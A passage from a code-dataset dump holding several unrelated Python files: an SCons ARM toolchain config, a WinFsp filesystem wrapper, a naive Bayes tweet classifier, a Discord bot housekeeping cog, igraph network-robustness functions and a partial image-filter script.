mark_time['mark'] + mark_title['mark'] * 0.2 + mark_site['mark'] * 0.2\r\n \"\"\"加入返回结果\"\"\"\r\n current.append({\r\n 'name':'Lecture', \r\n 'data':list(result),\r\n 'mark':mark['mark']\r\n })\r\n \"\"\"本层处理完毕,如果有必要,交给下一层处理\"\"\"\r\n if self.nextHandler != None and needNextFlag == True:\r\n return self.nextHandler.handle(current=current)\r\n else:\r\n return current\r\n\r\n","sub_path":"TuanTuan/TuanTuanApp/TextHandler/lecture_handler.py","file_name":"lecture_handler.py","file_ext":"py","file_size_in_byte":4728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"155291920","text":"\"\"\"\nSnagged alot of settings from:\n http://sourceforge.net/apps/trac/xpcc/browser/trunk/scons/arm.py?rev=651\n\"\"\"\nfrom SCons.Script import *\nimport os\nimport re\n\nroot = os.environ.get('GCC_ROOT')\n\nif root != None:\n print(\"Defaulting to configured toolchain location:\" + root)\n TOOLCHAIN_ROOT=root\n TOOLCHAIN_LIBDIR=os.path.join(TOOLCHAIN_ROOT, 'lib/gcc/arm-none-eabi/4.8.3')\n TOOLCHAIN_BINDIR=os.path.join(TOOLCHAIN_ROOT, 'bin')\n CROSS_COMPILE=TOOLCHAIN_BINDIR + '/arm-none-eabi-'\nelse:\n # Grab it from the path\n CROSS_COMPILE='arm-none-eabi-'\n\nOPENCM3_ROOT = os.path.join(Dir('#').abspath, 'libopencm3')\n\nSCM_REVISION = os.popen(\"git rev-parse HEAD\").read().rstrip()\n\nDEFS=['-DSTM32F2',\n '-DBOOTLOADER_MAJOR_VERSION=1', \n '-DBOOTLOADER_MINOR_VERSION=0', \n '-DBOOTLOADER_PATCH_VERSION=3',\n '-DMAJOR_VERSION=1', \n '-DMINOR_VERSION=1', 
\n '-DPATCH_VERSION=0',\n '-DNDEBUG',\n '-DSCM_REVISION=\\'\"%s\"\\'' % (re.sub(r'(..)', r'\\\\x\\1', SCM_REVISION)),\n '-DPB_FIELD_16BIT=1',\n '-DQR_MAX_VERSION=0']\n\nWARNS=['-Wall',\n '-Wno-sequence-point',\n '-Wextra',\n '-Wformat',\n '-Wformat-nonliteral',\n '-Wformat-security',\n '-Wimplicit-function-declaration',\n '-Winit-self',\n '-Wmultichar',\n '-Wpointer-arith',\n '-Wredundant-decls',\n '-Wreturn-type',\n '-Wshadow',\n '-Wsign-compare',\n '-Wstrict-prototypes',\n '-Wundef',\n '-Wuninitialized',\n '-Werror']\n\ndef load_toolchain():\n env = DefaultEnvironment()\n\n env['CC'] = CROSS_COMPILE + 'gcc'\n env['CXX'] = CROSS_COMPILE + 'g++'\n env['AR'] = CROSS_COMPILE + 'ar'\n env['AS'] = CROSS_COMPILE + 'g++' \n env['OBJCOPY'] = CROSS_COMPILE + 'objcopy'\n env['OBJDUMP'] = CROSS_COMPILE + 'objdump'\n env['LINK'] = CROSS_COMPILE + 'gcc'\n env['OBJPREFIX'] = ''\n env['OBJSUFFIX'] = '.o'\n env['LIBPREFIX'] = 'lib'\n env['LIBSUFFIX'] = '.a'\n env['SHCCFLAGS'] = '$CCFLAGS'\n env['SHOBJPREFIX'] = '$OBJPREFIX'\n env['SHOBJSUFFIX'] = '$OBJSUFFIX'\n env['PROGPREFIX'] = ''\n env['PROGSUFFIX'] = '.elf'\n env['RANLIB'] = CROSS_COMPILE + 'ranlib'\n env['SHLIBPREFIX'] = 'lib'\n env['SHLIBSUFFIX'] = '.so'\n\n env['LINKFLAGS'] = [ \n '-mthumb',\n '-mcpu=cortex-m3',\n '-nostartfiles',\n '-msoft-float',\n '-L'+OPENCM3_ROOT+'/lib',\n '-specs=nosys.specs',\n # Mapfile output via linker. Shows the memory map and \n # high level symbol table info \n '-Wl,-Map=${TARGET.base}.linkermap',\n '-Wl,--gc-sections',\n ]\n\n env['LIBPREFIXES'] = [ '$LIBPREFIX' ]\n env['LIBSUFFIXES'] = [ '$LIBSUFFIX' ]\n\n\n env['CCFLAGS'] = [\n '-mthumb',\n '-mcpu=cortex-m3',\n '-msoft-float',\n '-ffunction-sections',\n '-fdata-sections',\n '-fno-common',\n '-fstack-protector-all',\n '-I'+OPENCM3_ROOT+'/include',\n ]\n\n env['CCFLAGS'] = env['CCFLAGS'] + DEFS + WARNS\n\n env['CXXFLAGS'] = [\n \"-fno-exceptions\",\n \"-fno-rtti\",\n \"-fno-threadsafe-statics\",\n \"-fuse-cxa-atexit\",\n \"-Woverloaded-virtual\",\n \"-Weffc++\",\n \"-std=gnu++11\"\n ]\n\n env['CFLAGS'] = ['-std=gnu99' ]\n\n #\n # Assembler flags\n # \n env['ASFLAGS'] = [\n \"-mcpu=cortex-m3\",\n \"-mthumb\",\n \"-gdwarf-2\",\n \"-xassembler-with-cpp\",\n \"-Wa,-adhlns=${TARGET.base}.lst\",\n ]\n\n #\n # Debug\n #\n if int(ARGUMENTS.get('debug', 0)):\n env['CCFLAGS'] += ['-g', '-Os', '-DDEBUG_ON']\n else:\n env['CCFLAGS'] += ['-Os', '-g']\n\n add_builders(env)\n\n\n\n#\n# Adds custom diagnostic builders that output toolchain or platform specific diagnotic aids,\n# such as map files, srecords, etc.\ndef add_builders(env):\n #\n # Generate mapfile for debugging\n #\n def generate_map(source, target, env, for_signature):\n return '%s -dSt %s > %s' % (env['OBJDUMP'], source[0], target[0])\n\n #\n # SREC file because Paul likes them.\n #\n def generate_srec(source, target, env, for_signature):\n return '%s -O ihex %s %s' % (env['OBJCOPY'], source[0], target[0])\n\n #\n # bin file for bootloader\n #\n def generate_bin(source, target, env, for_signature):\n return '%s -O binary %s %s' % (env['OBJCOPY'], source[0], target[0])\n\n env.Append(BUILDERS=\\\n {\n 'Mapfile' : Builder(\n generator = generate_map,\n suffix = '.map',\n src_suffix = '.elf'),\n 'SRecord' : Builder(\n generator = generate_srec,\n suffix = '.srec',\n src_suffix = '.elf'),\n 'Binfile' : Builder(\n generator = generate_bin,\n suffix = '.bin',\n src_suffix = '.elf')\n 
})\n","sub_path":"site_scons/arm-none-gnu-eabi.toolchain.py","file_name":"arm-none-gnu-eabi.toolchain.py","file_ext":"py","file_size_in_byte":5066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"193516144","text":"from .plumbing.bindings import ffi, lib\nfrom .plumbing.file_system_interface import file_system_interface_trampoline_factory\nfrom .plumbing.winstuff import cook_ntstatus, nt_success\nfrom .exceptions import WinFSPyError, FileSystemAlreadyStarted, FileSystemNotStarted\nfrom .operations import BaseFileSystemOperations\n\n\ndef _volume_params_factory(\n sector_size=0,\n sectors_per_allocation_unit=0,\n max_component_length=0,\n volume_creation_time=0,\n volume_serial_number=0,\n transact_timeout=0,\n irp_timeout=0,\n irp_capacity=0,\n file_info_timeout=0,\n case_sensitive_search=0,\n case_preserved_names=0,\n unicode_on_disk=0,\n persistent_acls=0,\n reparse_points=0,\n reparse_points_access_check=0,\n named_streams=0,\n hard_links=0,\n extended_attributes=0,\n read_only_volume=0,\n post_cleanup_when_modified_only=0,\n pass_query_directory_pattern=0,\n always_use_double_buffering=0,\n pass_query_directory_file_name=0,\n flush_and_purge_on_cleanup=0,\n device_control=0,\n um_file_context_is_user_context2=0,\n um_file_context_is_full_context=0,\n um_reserved_flags=0,\n km_reserved_flags=0,\n prefix=\"\",\n file_system_name=\"\",\n volume_info_timeout_valid=0,\n dir_info_timeout_valid=0,\n security_timeout_valid=0,\n stream_info_timeout_valid=0,\n km_additional_reserved_flags=0,\n volume_info_timeout=0,\n dir_info_timeout=0,\n security_timeout=0,\n stream_info_timeout=0,\n):\n volume_params = ffi.new(\"FSP_FSCTL_VOLUME_PARAMS*\")\n lib.configure_FSP_FSCTL_VOLUME_PARAMS(\n volume_params,\n sector_size,\n sectors_per_allocation_unit,\n max_component_length,\n volume_creation_time,\n volume_serial_number,\n transact_timeout,\n irp_timeout,\n irp_capacity,\n file_info_timeout,\n case_sensitive_search,\n case_preserved_names,\n unicode_on_disk,\n persistent_acls,\n reparse_points,\n reparse_points_access_check,\n named_streams,\n hard_links,\n extended_attributes,\n read_only_volume,\n post_cleanup_when_modified_only,\n pass_query_directory_pattern,\n always_use_double_buffering,\n pass_query_directory_file_name,\n flush_and_purge_on_cleanup,\n device_control,\n um_file_context_is_user_context2,\n um_file_context_is_full_context,\n um_reserved_flags,\n km_reserved_flags,\n prefix,\n file_system_name,\n volume_info_timeout_valid,\n dir_info_timeout_valid,\n security_timeout_valid,\n stream_info_timeout_valid,\n km_additional_reserved_flags,\n volume_info_timeout,\n dir_info_timeout,\n security_timeout,\n stream_info_timeout,\n )\n return volume_params\n\n\nclass FileSystem:\n def __init__(self, mountpoint, operations, debug=False, **volume_params):\n self.started = False\n if not isinstance(operations, BaseFileSystemOperations):\n raise ValueError(f\"`operations` must be a `BaseFileSystemOperations` instance.\")\n\n self.mountpoint = mountpoint\n self.operations = operations\n\n self._volume_params = _volume_params_factory(**volume_params)\n set_delete_available = (\n type(operations).set_delete is not BaseFileSystemOperations.set_delete\n )\n self._file_system_interface = file_system_interface_trampoline_factory(\n set_delete_available=set_delete_available\n )\n self._file_system_ptr = ffi.new(\"FSP_FILE_SYSTEM**\")\n result = lib.FspFileSystemCreate(\n lib.WFSPY_FSP_FSCTL_DISK_DEVICE_NAME,\n self._volume_params,\n 
self._file_system_interface,\n self._file_system_ptr,\n )\n if not nt_success(result):\n raise WinFSPyError(f\"Cannot create file system: {cook_ntstatus(result).name}\")\n\n # Avoid GC on the handle\n self._operations_handle = ffi.new_handle(operations)\n self._file_system_ptr[0].UserContext = self._operations_handle\n\n if debug:\n lib.FspFileSystemSetDebugLogF(self._file_system_ptr[0], 1)\n\n def start(self):\n if self.started:\n raise FileSystemAlreadyStarted()\n self.started = True\n\n result = lib.FspFileSystemSetMountPoint(self._file_system_ptr[0], self.mountpoint)\n if not nt_success(result):\n raise WinFSPyError(f\"Cannot mount file system: {cook_ntstatus(result).name}\")\n result = lib.FspFileSystemStartDispatcher(self._file_system_ptr[0], 0)\n if not nt_success(result):\n raise WinFSPyError(f\"Cannot start file system dispatcher: {cook_ntstatus(result).name}\")\n\n def stop(self):\n if not self.started:\n raise FileSystemNotStarted()\n self.started = False\n\n lib.FspFileSystemStopDispatcher(self._file_system_ptr[0])\n lib.FspFileSystemDelete(self._file_system_ptr[0])\n","sub_path":"src/winfspy/file_system.py","file_name":"file_system.py","file_ext":"py","file_size_in_byte":4958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"622398915","text":"import csv\nfrom twitter_specials import *\nfrom math import *\nimport string\n\nword_counts_dict = {} # \"word\": [positive, negative, neutral, irrelevant, total counts]\ncategory_to_num = {\"positive\": 0, \"negative\":1, \"neutral\":2, \"irrelevant\": 3}\nnum_to_category = {0: \"positive\", 1: \"negative\", 2: \"neutral\", 3: \"irrelevant\"}\ntotal_entries = [0, 0, 0, 0, 0] #[positive, negative, neutral, irrelevant, total counts]\n\nexclude = set(string.punctuation)\ndef split_words(string):\n split = string.split()\n output = []\n for w in split:\n if '#' not in w and '@' not in w:\n str = \"\"\n for ch in w:\n if (ch not in exclude):\n str += ch\n output += [str]\n return output\n\n\ndef preprocessing():\n count = 0\n last_tweet = ''\n with open(\"labeled_corpus.tsv\", encoding=\"utf-8\") as csvfile:\n readCSV = csv.reader(csvfile, delimiter='\\t')\n for row in readCSV:\n line_arr = list(row)\n\n tweet = line_arr[0]\n category = str(line_arr[1])\n\n if (category not in category_to_num):\n last_tweet = last_tweet + \" \" + tweet + \" \" + category\n continue\n\n if (last_tweet != ''):\n tweet = last_tweet + \" \" + tweet\n last_tweet = ''\n\n tweet = clean_tweet(tweet, emo_repl_order, emo_repl, re_repl)\n\n words = split_words(tweet)\n word_set = set()\n for w in words:\n if '#' not in w and '@' not in w:\n word_set.add(w)\n\n total_entries[-1] += 1\n total_entries[category_to_num[category]] += 1\n for w in word_set:\n if w not in word_counts_dict:\n word_counts_dict[w] = [0, 0, 0, 0, 0]\n word_counts_dict[w][-1] += 1 #total count +1\n word_counts_dict[w][category_to_num[category]] += 1 #categorical count +1\n\n csvfile.close()\n\n\nprobabilities_dict = {} #[positive, negative, neutral, irrelevant]\ndef probabilities():\n for w, counts in word_counts_dict.items():\n probabilities_dict[w] = [counts[0]/total_entries[0], counts[1]/total_entries[1], counts[2]/total_entries[2], counts[3]/total_entries[3]] #conditional probability for each word\n for i in range(4):\n probabilities_dict[i] = log(total_entries[i]/total_entries[-1]) #prior probabilities with log\n\nresult = []\ndef classifier():\n file_object = open('locations_classified.tsv', 'w', newline='')\n writeTSV = 
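For context on the FileSystem class above, a typical mount/unmount lifecycle looks roughly like the sketch below; MyOperations is a hypothetical subclass of BaseFileSystemOperations, and the mountpoint and volume parameter values are illustrative:

    operations = MyOperations()  # assumed to implement the required callbacks
    fs = FileSystem('X:', operations, debug=False, sector_size=512)
    fs.start()   # mounts and starts the dispatcher
    try:
        input('Mounted on X:, press enter to stop...')
    finally:
        fs.stop()  # stops the dispatcher and deletes the file system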
csv.writer(file_object, delimiter='\\t')\n with open(\"geo_twits_squares.tsv\", encoding=\"utf-8\") as tsvfile:\n readTSV = csv.reader((line.replace('\\0','') for line in tsvfile), delimiter='\\t')\n for row in readTSV:\n line_arr = list(row)\n latitude = line_arr[0]\n longitude = line_arr[1]\n tweet = line_arr[2]\n tweet = clean_tweet(tweet, emo_repl_order, emo_repl, re_repl)\n\n words = split_words(tweet)\n word_set = set()\n for w in words:\n if '#' not in w and '@' not in w:\n word_set.add(w)\n\n posterior = [probabilities_dict[0], probabilities_dict[1], probabilities_dict[2], probabilities_dict[3]]\n\n for w in word_set:\n for i in range(4):\n try:\n probabilities_dict[w]\n except:\n continue\n if (probabilities_dict[w][i] != 0):\n posterior[i] += log(probabilities_dict[w][i])\n\n m = max(posterior)\n classified = [i for i, j in enumerate(posterior) if j == m]\n writeTSV.writerow([latitude, longitude, num_to_category[classified[0]]])\n #result.append([latitude, longitude, classified[0]])\n file_object.close()\n tsvfile.close()\n\nlocation_counts_dict = {}\ndef positivity_score():\n file_object = open('positivity_score.tsv', 'w', newline='')\n writeTSV = csv.writer(file_object, delimiter='\\t')\n with open(\"locations_classified.tsv\", encoding=\"utf-8\") as tsvfile:\n readTSV = csv.reader((line.replace('\\0','') for line in tsvfile), delimiter='\\t')\n for row in readTSV:\n line_arr = list(row)\n latitude = line_arr[0]\n longitude = line_arr[1]\n category = line_arr[2]\n\n if (latitude, longitude) not in location_counts_dict:\n location_counts_dict[(latitude, longitude)] = [0, 0, 0, 0]\n location_counts_dict[(latitude, longitude)][category_to_num[category]] += 1\n\n for (location, count) in location_counts_dict.items():\n total = count[0]+count[1]+count[2]+count[3]\n score = (count[0]/total-count[1]/total+1)/2\n writeTSV.writerow([location[0], location[1], score])\n\n file_object.close()\n tsvfile.close()\n\n\ndef location_data():\n first_line = True\n file_object = open('./public_html/data.js', 'w', newline='')\n file_object.write(\"var data = [\")\n with open(\"positivity_score.tsv\", encoding=\"utf-8\") as tsvfile:\n readTSV = csv.reader((line.replace('\\0','') for line in tsvfile), delimiter='\\t')\n for row in readTSV:\n line_arr = list(row)\n line_arr[0] = str(float(line_arr[0])+0.05/2)\n line_arr[1] = str(float(line_arr[1])+0.05/2)\n if first_line:\n file_object.write('{\"score\": ' + line_arr[2] + ', \"g\": ' + line_arr[1] + ', \"t\": ' + line_arr[0] + '}')\n first_line = False\n else:\n file_object.write(', {\"score\": ' + line_arr[2] + ', \"g\": ' + line_arr[1] + ', \"t\": ' + line_arr[0] + '}')\n tsvfile.close()\n file_object.write('];')\n file_object.close()\n\npreprocessing() #count tweets in training data\nprobabilities() #calculate probabilities\nclassifier() #classify and write locations_classified.tsv\npositivity_score() #calculate positivity scores and write positivity_score.tsv\nlocation_data() #write data.js\n","sub_path":"naive_bayes_classifier.py","file_name":"naive_bayes_classifier.py","file_ext":"py","file_size_in_byte":6024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"566070887","text":"import logging\nimport discord\nfrom .. import config\nfrom discord.ext import commands\nfrom ..tables import StudentData, Guild\nfrom .. 
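The classifier above scores in log space to avoid floating-point underflow: it picks the argmax over classes of log P(c) + the sum of log P(w|c), skipping words with zero conditional probability. That scoring step, condensed (function and argument names are illustrative):

    from math import log

    def class_score(words, log_prior, cond_prob):
        # log_prior: log P(c); cond_prob: dict mapping word -> P(word | c)
        score = log_prior
        for w in set(words):
            p = cond_prob.get(w, 0.0)
            if p > 0.0:
                score += log(p)
        return score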
import engine, postgres_engine, config\nfrom sqlalchemy.ext.asyncio import AsyncSession\nfrom ..utils import find_ann_channel, permissions, fake_ctx\n\nlogger = logging.getLogger(__name__)\n\n@property\ndef mention(self):\n # NOTE: Keep an eye on Discord mobile because they might change it\n # so it does not always say '#invalid-channel' and actually shows the channel\n return f'**#{channel}**' if self.guild.owner and self.guild.owner.is_on_mobile() \\\n else f'<#{self.id}>'\n\ndiscord.TextChannel.mention = mention\n\nclass CosmicHouseKeepingCog(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n self.session = AsyncSession(bind=engine, binds={StudentData: postgres_engine})\n\n @commands.Cog.listener()\n async def on_ready(self):\n for guild in self.bot.guilds:\n sql_guild = await self.session.get(Guild, guild.id)\n if sql_guild is None:\n channel = find_ann_channel(guild)\n if channel is None:\n sql_guild = Guild(guild_id=guild.id)\n logger.warning(f\"The bot was unable to find the announcements channel in {guild}.\")\n if config.DM_owner:\n await guild.owner.send((f\"While looking through the text channels in **{guild}** \"\n f\"I was unable to find your announcements channel. Please use `{self.parsed_command_prefix}setann` \"\n \"to set the announcements channel.\"))\n else:\n sql_guild = Guild(guild_id=guild.id, announcements_id=channel.id)\n logger.info(f\"The bot detected '{channel}' as the announcements channel in {guild}.\")\n if config.DM_owner:\n await guild.owner.send((f\"In **{guild}**, the announcement channel was automatically set to {channel.mention}! \"\n f\"If you think this is a mistake use `{self.parsed_command_prefix}setann` to change it.\"))\n logger.info(f\"The bot sent a DM message to {guild.owner} confirming the announcements channel was correct, \"\n f\"since it is the bot's first time in {guild}.\")\n self.session.add(sql_guild)\n await self.session.commit()\n else:\n channel = guild.get_channel(sql_guild.announcements_id)\n if channel is None:\n channel = find_ann_channel(guild)\n script = f\"In **{guild}**, the announcements channel appears to have been deleted\"\n if channel is None:\n if config.DM_owner:\n await guild.owner.send(script + (f\". Please use `{self.parsed_command_prefix}setann` \"\n \"to set a new announcements channel.\"))\n else:\n sql_guild.announcements_id = channel.id\n await self.session.commit()\n if config.DM_owner:\n await guild.owner.send(script + (f\", however, I automatically detected {channel.mention} \"\n \"as the announcements channel! If you think this is a mistake \"\n f\"use `{self.parsed_command_prefix}setann` to change it.\"))\n if not permissions(channel, guild.me, 'send_messages'):\n logger_message = (f\"The bot detected '{channel}' as the announcements channel, however, \"\n \"the bot did not have the required permissions to send messages in it.\")\n if config.DM_owner:\n await guild.owner.send((f\"In **{guild}**, I detected {channel.mention} as the announcements channel, \"\n \"however, I don't have the required permissions to send messages in it. 
\"\n f\"If you would like to me to use {channel.mention} please give me the \"\n f\"`send messages` permission and then use the `{self.parsed_command_prefix}setann` \"\n f\"command to set {channel.mention} as the announcements channel.\"))\n logger_message += f\" {guild.owner} was sent a message notifying them of the situation.\"\n logger.warning(logger_message)\n sql_guild.announcements_id = None\n await self.session.commit()\n\n @commands.Cog.listener()\n async def on_guild_channel_update(self, before, after):\n guild = await self.session.get(Guild, after.guild.id)\n if guild.announcements_id == before.id and not permissions(after, after.guild.me, 'send_messages'):\n guild.announcements_id = None\n await self.session.commit()\n if config.DM_owner:\n await after.guild.owner.send((f\"While changing {channel.mention} you or someone in **{after.guild}** \"\n f\"accidently made it so I can no longer send messages in {channel.mention}. \"\n f\"Please use `{self.bot.parsed_command_prefix}setann` to set another announcements \"\n \"channel.\"))\n\n @commands.Cog.listener()\n async def on_guild_channel_delete(self, channel):\n guild = await self.session.get(Guild, channel.guild.id)\n if channel.id == guild.announcements_id:\n guild.announcements_id = None\n await self.session.commit()\n if config.DM_owner:\n await channel.guild.owner.send((\"You or someone in the server deleted the channel I announce birthdays in. \"\n f\"Please set a new channel with `{self.bot.parsed_command_prefix}setann`\"))\n\n @commands.Cog.listener()\n async def on_member_update(self, before, after):\n if after == self.bot.user:\n guild = await self.session.get(Guild, after.guild.id)\n missing_manage_roles = False\n if before.roles != after.roles and guild.role_id not in map(lambda role: role.id, after.roles):\n try:\n await self.bot.invoke(fake_ctx(self.bot, 'update_role', after.guild))\n except commands.BotMissingPermissions:\n logger.warning(f\"Someone in {after.guild} accidently made it so that the bot can no longer change roles.\")\n if config.DM_owner:\n await after.guild.owner.send((f\"While changing my roles, you or someone in **{after.guild}** \"\n \"made it so I can no longer update my role. Please give me the \"\n \"`manage roles` permission so I can change my role.\"))\n\n missing_manage_roles = True\n\n if guild.announcements_id:\n channel = after.guild.get_channel(guild.announcements_id)\n if not permissions(channel, after.guild.me, 'send_messages'):\n beginning = \"Additionally,\" if missing_manage_roles \\\n else f\"While changing my roles you or someone in **{after.guild}** made it so\"\n guild.announcements_id = None\n await self.session.commit()\n logger_message = (f\"Someone in {after.guild} accidently made it so that \"\n \"the bot can no longer send messsages in the announcements channel.\")\n if config.DM_owner:\n await after.guild.owner.send((f\"{beginning} I can no longer send messages in {channel_mention}. \"\n f\"Therefore, {channel_mention} is no longer the announcements channel. 
\"\n \"If you want to set a new announcements channel please use \"\n f\"`{self.parsed_command_prefix}setannouncements`.\"))\n logger_message += f\" A message was sent to {after.guild.owner}.\"\n logger.warning(logger_message)\n","sub_path":"bdaybot/cogs/housekeeping.py","file_name":"housekeeping.py","file_ext":"py","file_size_in_byte":8566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"245879517","text":"# Let's take task 2.3 and comment it\n\n# Here we ask user to input his name\nname = input()\n#In case user wrote extra spaces, we get rid of them\nname = name.strip()\n#Then we store message, which we'll print later in variable. Alse, on this step\n#we make name look properly, with a capital first letter\nmessage = \"Hello \" + name.title() + \", would you like to learn some Python today?\"\n\nprint(message)","sub_path":"project1/venv/chapter 2/2.10_adding_comments.py","file_name":"2.10_adding_comments.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"568836239","text":"class Solution(object):\r\n def reverseWords(self, s):\r\n \"\"\"\r\n :type s: str\r\n :rtype: str\r\n \"\"\"\r\n s = s.split()\r\n s = s[::-1]\r\n answer = ' '.join(s)\r\n return answer\r\n\r\ns = Solution()\r\nprint(s.reverseWords(\" hello world! \"))\r\n","sub_path":"CodeInterview/BD-翻转字符串中的单词(优秀答案).py","file_name":"BD-翻转字符串中的单词(优秀答案).py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"176297862","text":"# from networkGenerator import *\nfrom igraph import *\nfrom random import random as rand\nimport numpy as np\n\n#-------------------------- VULNERABILITY LIST GENERATOR ------------------------\ndef effGlobal(g, weighted=False): # global efficiency calculator\n\n eff= 0.0\n temp = []\n N = float(g.vcount())\n if weighted:\n _weight = np.array(g.es['weight'])\n _weight = np.array([1.0/x if x != 0.0 else 0 for x in _weight])\n for l in g.shortest_paths_dijkstra(weights = _weight):\n for ll in l:\n if(ll != 0):\n eff+= (1.0/ll)\n else:\n for l in g.shortest_paths_dijkstra():\n for ll in l:\n if(ll != 0):\n eff+= (1.0/ll)\n E = 0\n try:\n E = eff/(N*(N-1.0))\n except:\n pass\n return E\n\ndef calculator(g, weighted = False): # vulnerability calculator\n allEff = []\n eGlobal = effGlobal(g, weighted)\n for k in range(g.vcount()):\n g_copy = g.copy()\n list_of_ids = []\n\n for vertex_id in range(g_copy.vcount()):\n try:\n list_of_ids.append(g_copy.get_eid(k, vertex_id))\n except:\n pass\n g_copy.delete_edges(list_of_ids)\n aux = (eGlobal - effGlobal(g_copy,weighted))/eGlobal\n allEff.append(aux)\n\n _max = max(allEff)\n node_size = np.array(allEff)\n _min = min(allEff)\n\n node_size = 7+ ((node_size - _min) * (45 - 7))/(_max - _min)\n g.vs['size'] = node_size\n index = allEff.index(_max)\n return allEff\n\n#----------------- COMPONENTE GINGANTE -----------------------------\n#----------------- REMOVAL LIST GENERATOR BY METRICS -----------------------------\n\ndef removalFunction(g, metric):\n N = g.vcount()\n removaList = np.zeros(N)\n removaList[0] = 1.0\n count=1\n while g.vcount() > 1:\n _max = max(metric)\n index = metric.index(_max)\n g.delete_vertices(index)\n del metric[index]\n clusters = g.components()\n removaList[count] = max(clusters.sizes())/N\n count+=1\n return removaList\n\n\n#---------- RANDOM REMOVAL LIST GENERATOR-----------------------\n\n\ndef 
randomRemovalgenerator(g, simulation):\n\n N = g.vcount()\n removaList = np.zeros(N)\n\n for i in range(simulation):\n gcopy = g.copy()\n removaList[0] += 1.0\n count=1\n while gcopy.vcount() > 1:\n index = rand() * gcopy.vcount()\n index = int(index)\n gcopy.delete_vertices(index)\n clusters = gcopy.components()\n if len(clusters) > 0:\n removaList[count] += max(clusters.sizes())/float(N)\n # print(clusters.sizes())\n else:\n removaList[count] += 0.0\n count = count+1 \n removaList = removaList/simulation\n return removaList\n\n\ndef removal_methods_main(g):\n metricList = []\n N =g.vcount()\n metricNameList = []\n # remList = []\n\n # DEGREE\n degree_removal_list = removalFunction(g.copy(),g.degree())\n metricList.append(degree_removal_list)\n metricNameList.append(\"Degree\")\n\n # BETWEENNESS WITHOUT WEIGHT\n betweenness_removal_list = removalFunction(g.copy(),g.betweenness())\n metricList.append(betweenness_removal_list)\n metricNameList.append(\"Betweenness\")\n\n # BETWEENNESS WITH WEIGHT\n _weight = np.array(g.es['weight'])\n _weight = np.array([1.0/x if x != 0.0 else 0 for x in _weight])\n betweenness_removal_list = removalFunction(g.copy(),g.betweenness(weights = _weight))\n metricList.append(betweenness_removal_list)\n metricNameList.append(\"Betweenness with Weights\")\n\n # STRENGTH WEIGHT\n strength_removal_list = removalFunction(g.copy(),g.strength(weights = g.es['weight']))\n metricList.append(strength_removal_list)\n metricNameList.append(\"Strength\")\n\n # VULNERABILITY\n vulnerability_removal_list = removalFunction(g.copy(),calculator(g.copy()))\n metricList.append(vulnerability_removal_list)\n metricNameList.append(\"Vulnerability\")\n \n # VULNERABILITY WITH WEIGHTS\n vulnerability_removal_list = removalFunction(g.copy(),calculator(g.copy(), True))\n metricList.append(vulnerability_removal_list)\n metricNameList.append(\"Vulnerability with Weights\")\n \n # RANDOM REMOVAL\n random_removal_list = randomRemovalgenerator(g.copy(), 100)\n metricList.append(random_removal_list)\n metricNameList.append(\"Random\")\n return [metricList, metricNameList]\n","sub_path":"deriv/removalMethods.py","file_name":"removalMethods.py","file_ext":"py","file_size_in_byte":4474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"157922890","text":"import math\nimport PIL as pillow\nfrom PIL import Image\n\n\ndef myfilter(filt, im, sigma, threshold):\n if filt == 'gaussian':\n # window size\n sz = 6*sigma-1\n # compute kernel \n kernel = np.zeros((sz, sz))\n max_len = int(sz/2)\n twosigma = 2.0*(sigma**2)\n twopisigma = 1.0/(twosigma*np.pi)\n\n for x in range(-max_len, max_len+1):\n xsq = x**2\n for y in range(-max_len, max_len+1):\n ysq = y**2\n pwr = -1*(xsq + ysq)/twosigma\n kernel[x+max_len][y+max_len] = np.exp(pwr) * twopisigma\n\n k_sum = np.sum(kernel)\n # normalize filter to be 1\n if k_sum != 1:\n kernel = np.divide(kernel, k_sum)\n\n # apply filter to image\n xmax = im.shape[0]\n ymax = im.shape[1]\n convolve = im.copy()\n\n for x in range(0, xmax):\n for y in range(0, ymax):\n convolve[x][y] = convolve_point(x, y, im, kernel)\n return convolve\n \n elif filt == 'sobel-x':\n sobel_x = np.array([\n [-1, 0, 1],\n [-2, 0, 2],\n [-1, 0, 1] ])\n\n # apply filter to image\n xmax = im.shape[0]\n ymax = im.shape[1]\n convolve = im.copy()\n\n for x in range(0, xmax):\n for y in range(0, ymax):\n convolve[x][y] = convolve_point(x, y, im, sobel_x)\n\n for i in range(0, xmax):\n for j in range(0, ymax):\n if convolve[i][j] == threshold:\n 
convolve[i][j] = 0\n\n return convolve\n \n elif filt == 'sobel-y':\n sobel_y = np.array([\n [-1,-2,-1],\n [ 0, 0, 0],\n [ 1, 2, 1] ])\n\n # apply filter to image\n xmax = im.shape[0]\n ymax = im.shape[1]\n convolve = im.copy()\n\n for x in range(0, xmax):\n for y in range(0, ymax):\n convolve[x][y] = convolve_point(x, y, im, sobel_y)\n\n for i in range(0, xmax):\n for j in range(0, ymax):\n if convolve[i][j] == threshold:\n convolve[i][j] = 0\n \n return convolve\n \ndef gauss_kern(sigma):\n kernel = [[0,0,0],[0,0,0],[0,0,0]]\n ksum = 0\n for x in range(3):\n for y in range(3):\n xsq = x**2\n ysq = y**2\n twosigma = 2.0*(sigma**2)\n twopisigma = 1.0/(twosigma*math.pi)\n pwr = -1*(xsq + ysq)/twosigma\n kernel[x][y] = math.e*pwr * twopisigma\n ksum += kernel[x][y]\n mult = 10/ksum\n for x in range(3):\n for y in range(3):\n kernel[x][y] *= mult\n print(kernel)\n return kernel\n\n\ndef convolve_point(x, y, im, kernel):\n xmax = im.shape[0]\n ymax = im.shape[1]\n kxmax = kernel.shape[0]\n kymax = kernel.shape[1]\n kxmax = int(kxmax/2)\n kymax = int(kymax/2)\n conv_sum = np.int64(0)\n\n for kx in range(-kxmax, kxmax+1):\n for ky in range(-kymax, kymax+1):\n adjx = kx+x\n adjy = 